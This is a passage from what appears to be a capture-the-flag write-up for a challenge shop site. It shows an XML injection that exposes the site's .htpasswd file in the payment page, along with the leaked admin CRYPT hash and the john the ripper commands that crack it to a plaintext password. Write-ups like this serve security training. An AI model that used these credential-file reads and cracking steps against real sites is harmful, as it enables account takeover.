Changes
/* Solution */
</pre>
* The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table.
* Here's the HTML result
<pre>
<!DOCTYPE html>
<html lang="en">
<head>
<title>Wander Shop</title>
<link rel="StyleSheet" href="css/bootstrap.min.css" type="text/css"/>
<script src="js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
<h1>Wander Shop</h1>
Verify your cart:<table class='table table-condensed'><tr><td>admin:sQcHhNWX6v1VM
</td><td>x</td><td>asd</td></tr></table>
<form action="pay.php">
<input type="submit" value="Pay"/>
</form>
</div>
</body>
</html>
</pre>
* The password is in CRYPT format, which is easily bruteforced with john the ripper
echo 'admin:sQcHhNWX6v1VM' > /tmp/pass
john /tmp/pass
>slamas (admin)
